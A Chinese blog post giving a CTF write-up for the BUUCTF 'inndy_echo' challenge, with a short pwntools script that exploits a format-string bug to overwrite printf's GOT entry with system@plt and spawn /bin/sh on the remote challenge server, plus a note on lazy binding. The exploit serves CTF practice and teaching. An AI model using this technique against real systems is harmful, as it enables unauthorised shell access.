BUUCYF之“inndy_echo”接单记录

该篇博客探讨了在远程服务器上通过利用格式字符串漏洞(fmtstr_payload)来修改printf_got寄存器,使其指向system_plt的技巧。由于延迟绑定,直接使用elf.got['system']不可行,因为system函数尚未执行,got表中的地址未被填充。最终,通过注入payload并触发执行'/bin/sh'来实现命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

WP

from pwn import*
p=remote('node4.buuoj.cn',25844)
context.log_level='debug'
elf=ELF("./echo")
printf_got=elf.got['printf']
system_plt=0x8048400#等价于elf.plt['system']
payload=fmtstr_payload(7,{printf_got:system_plt})
p.sendline(payload)
p.sendline(";/bin/sh\x00")
p.interactive()

值得注意的是为什么不用elf.got[‘system’]因为延迟绑定,system之前没有被执行过,所以elf.got表内的system地址没有被修改为真正地址。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值